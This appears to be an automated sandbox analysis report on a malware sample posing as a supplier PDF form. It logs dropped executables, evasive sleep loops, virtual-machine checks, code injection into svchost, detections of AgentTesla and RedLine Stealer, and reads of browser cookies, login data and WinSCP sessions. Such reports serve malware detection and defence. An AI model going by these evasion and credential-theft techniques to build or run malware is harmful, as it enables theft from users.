Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{3007B876-EF79-48CC-9A41-17D9D214FFC1}\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdate.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.372\GoogleUpdateSetup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE TID: 7060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7016 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE TID: 6220 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1996 Thread sleep count: 1048 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99857s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99730s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99618s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1996 Thread sleep count: 8792 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99397s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99144s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98779s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98668s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98556s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98096s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97856s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97523s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97414s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97302s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97190s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -96952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99889s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99665s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99553s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99427s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99173s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98934s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98710s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98598s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98470s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98342s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98221s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97975s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97864s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97736s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97270s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6248 Thread sleep time: -330000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6248 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7020 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99857
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99730
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99618
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99507
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99397
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99282
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99144
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99033
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98779
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98668
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98556
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98445
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98334
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98096
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97856
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97633
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97523
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97414
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97302
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97190
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97062
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96952
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99889
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99777
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99665
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99553
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99427
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99300
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99173
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99045
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98934
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98710
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98598
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98470
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98342
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98221
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97975
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97864
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97736
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97609
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97497
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97385
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97270
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation
Enables debug privileges
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Memory written: C:\Windows\SysWOW64\svchost.exe base: 30D5008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST7919.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST792A.tmp VolumeInformation
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000012.00000002.2465149374.000000000329E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.000000000329A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 00000010.00000002.1218270689.0000000003789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1209788633.0000000000E42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
